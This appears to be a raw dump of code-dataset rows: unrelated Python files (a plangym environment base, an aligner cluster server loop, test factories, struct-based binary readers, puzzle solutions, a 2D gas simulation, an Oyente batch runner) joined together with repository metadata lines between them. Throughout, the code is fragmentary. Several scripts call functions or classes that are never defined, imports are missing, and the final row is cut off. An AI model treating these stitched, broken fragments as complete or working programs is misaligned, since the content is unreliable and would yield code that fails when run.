def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
episodic_live: Return ``end = True`` when losing a live.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
# This allows to get the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
obs_type: One of {"rgb", "ram", "gryscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
render_mode: One of {None, "human", "rgb_aray"}.
possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
or doest not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
A vectorized environment allows to step several copies of the environment in parallel
when calling ``step_batch``.
It creates a local copy of the environment that is the target of all the other
methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
frameskip: Number of times ``step`` will me called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
env_callable: Callable that returns an instance of the environment \
that will be parallelized.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
If is not provided the signature matches the one from OpenAI gym. It allows \
to apply arbitrary boundary conditions to define custom end states in case \
the env was initialized with a "CustomDeath' object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
if states is None returns `(observs, rewards, ends, infos) `else \
`(new_states, observs, rewards, ends, infos)`.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
Reset the environment and returns the first observation, or the first \
(state, obs) tuple.
Args:
return_state: If true return a also the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
        A state completely describes the Environment at a given moment.

Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
dt: [numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
It allows to step a vector of states and actions. The signature and \
behaviour is the same as ``step``, but taking a list of states, actions \
and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635 | 99 | 0.613232 |
5f890b9328d6983928b109fecc583fe7148f59dc | 6,426 | py | Python | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | # Layer 2 server script
# project worker
'''-.
+#_p'-.....
*+...:(loop):..............................................
m}: \
>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@%: 4. remove timed-out from pending and re-open them :
#$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
<: /
%$":......................................................../
%&"$%!.-
$"!.-
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034 | 124 | 0.495331 |
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a | 2,677 | py | Python | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
| 26.245098 | 105 | 0.548001 |
5f9164c1cc7e9494a573895e93fd39680b8520f6 | 1,324 | py | Python | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | null | null | null | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 1 | 2022-01-18T09:28:29.000Z | 2022-01-18T09:28:29.000Z | ymir/backend/src/ymir_app/app/models/iteration.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
| 36.777778 | 79 | 0.749245 |
5f92da5358e075a34f655feb29ca353ec1f92807 | 2,833 | py | Python | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 2 | 2016-08-10T15:08:47.000Z | 2016-10-25T14:27:51.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 41 | 2016-08-04T20:19:49.000Z | 2017-03-07T20:05:53.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 3 | 2016-09-26T19:04:51.000Z | 2017-10-26T22:13:45.000Z | import uuid, hashlib, os, yaml, logging.config, json, requests, re
from bcrypt import hashpw, gensalt
from collections import namedtuple
from sqlalchemy import create_engine
from datetime import datetime
CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE')
ZimbraGrant = namedtuple(
'ZimbraGrant', [
'target_name',
'target_type',
'grantee_name',
'grantee_type',
'right',
'deny'
]
)
logger = CallLogger.logger()
| 26.726415 | 85 | 0.693611 |
5f9463815346a08c07f5a3a2ec02e760f4e9de1f | 3,569 | py | Python | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | 25 | 2021-10-03T06:19:05.000Z | 2022-03-27T12:48:57.000Z | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | import struct
from typing import BinaryIO
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CMarkedType(CFixedType):
"""
Overview:
Type with struct mark, which can be directly read by ``struct`` module.
"""
def __init__(self, mark: str, size: int):
"""
Constructor of :class:`CMarkedType`.
:param mark: Mark of the type.
:param size: Size of the type.
"""
CFixedType.__init__(self, size)
self.__mark = mark
def read(self, file: BinaryIO):
"""
Read from binary with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Result value.
"""
r, = struct.unpack(self.mark, file.read(self.size))
return r
def write(self, file: BinaryIO, val):
"""
Write value to binary IO with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Writing value.
"""
file.write(struct.pack(self.mark, float(val)))
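# Usage sketch: read()/write() above are thin wrappers around ``struct`` plus a
# binary file object. For a hypothetical 4-byte float type (mark '<f', size 4)
# the round trip reduces to the plain struct calls below (the public factory
# names for the concrete types are not shown in this file, so struct is used
# directly here):
#
#   import io, struct
#   buf = io.BytesIO()
#   buf.write(struct.pack('<f', 2.5))            # what write(buf, 2.5) does
#   buf.seek(0)
#   value, = struct.unpack('<f', buf.read(4))    # what read(buf) does
#   assert value == 2.5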
| 24.445205 | 87 | 0.55842 |
5f94b482c019a016c621810412b2112d18748236 | 958 | py | Python | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result) | 23.365854 | 51 | 0.654489 |
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9 | 3,679 | py | Python | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | #MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop(); | 44.325301 | 141 | 0.651264 |
5f972ab5ab25213d75c3f56834078dbd2a9d9668 | 706 | py | Python | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | 3 | 2020-12-09T11:36:31.000Z | 2020-12-11T01:41:52.000Z | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from itertools import chain
from pathlib import Path
from typing import List
INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt"
AnswerGroup = List[str]
if __name__ == "__main__":
with INPUT_FILE.open("r") as f:
input = transform_input(f.read())
print(f"Part 1: {part1(input)}")
print(f"Part 2: {part2(input)}")
| 23.533333 | 75 | 0.660057 |
5f979d09341797e001c31791e45f05729f30d0c6 | 933 | py | Python | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | from symopt.base import SymOptExpr
import sympy as sym
| 27.441176 | 72 | 0.608789 |
5f97f0b8c3e75f1f6f491e876381487088f22f49 | 771 | py | Python | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 4 | 2017-01-25T05:25:52.000Z | 2021-02-18T08:48:51.000Z | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | null | null | null | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 1 | 2018-08-09T20:57:31.000Z | 2018-08-09T20:57:31.000Z | import json
import glob
from tqdm import tqdm
import os
contract_dir = 'contract_data'
cfiles = glob.glob(contract_dir+'/contract*.json')
cjson = {}
print "Loading contracts..."
for cfile in tqdm(cfiles):
cjson.update(json.loads(open(cfile).read()))
results = {}
missed = []
print "Running analysis..."
for c in tqdm(cjson):
with open('tmp.evm','w') as of:
# print "Out: "+cjson[c][1][2:]
of.write(cjson[c][1][2:]+"\0")
os.system('python oyente.py tmp.evm -j -b')
try:
results[c] = json.loads(open('tmp.evm.json').read())
except:
missed.append(c)
print "Writing results..."
with open('results.json', 'w') as of:
of.write(json.dumps(results,indent=1))
with open('missed.json', 'w') as of:
of.write(json.dumps(missed,indent=1))
print "Completed." | 19.769231 | 54 | 0.66537 |
5f981f7b480688c0f261ed48cbccc55b236c176c | 2,266 | py | Python | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2020-07-01T14:40:10.000Z | 2020-07-01T14:40:10.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 9 | 2020-02-07T11:58:51.000Z | 2021-09-07T16:23:38.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2019-11-20T05:53:13.000Z | 2019-11-20T05:53:13.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel
from textory.statistics import variogram, pseudo_cross_variogram
def test_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, _ = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - a[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert variogram(a, lag=1) == res
def test_pseudo_cross_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, b = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - b[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert pseudo_cross_variogram(a, b, lag=1) == res
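# For reference, both tests above brute-force the empirical (semi)variogram
# estimator
#     gamma(h) = 1 / (2 * N(h)) * sum_i (z(x_i) - z(x_i + h)) ** 2
# (with the second array b in place of the shifted z for the pseudo
# cross-variogram), summing squared differences between every cell and all
# neighbours within `lag` steps; the fixed divisor 40000 presumably stands in
# for 2 * N(h) for the fixture arrays, whose shape comes from init_np_arrays.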
| 27.634146 | 101 | 0.566637 |
5f9861c2730925ff3619b6059676dc2a261cbae6 | 827 | py | Python | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 9 | 2020-08-12T10:01:00.000Z | 2022-01-05T04:37:48.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 1 | 2021-02-16T10:19:31.000Z | 2021-02-16T10:19:31.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 4 | 2020-08-12T10:13:31.000Z | 2021-11-05T01:26:58.000Z | # -*- coding: utf-8 -*-
# @Author : LG
"""
152 ms, Python3 96.83%
14 MB, Python3 12.45%
""" | 27.566667 | 59 | 0.41717 |
5f98d7e1817b744273f69d626fee4ccb8dd5c371 | 319 | py | Python | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | #Leia o sexo de uma pessoa, s aceite as letras M ou F; Caso contrario, pea a digitao novamente
sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0]
while sexo not in 'MF':
sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0]
print('seu sexo {} e est registrado com sucesso!'.format(sexo)) | 39.875 | 98 | 0.670846 |
5f993e929da96965b346f667b7d028433a1f27c0 | 2,157 | py | Python | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
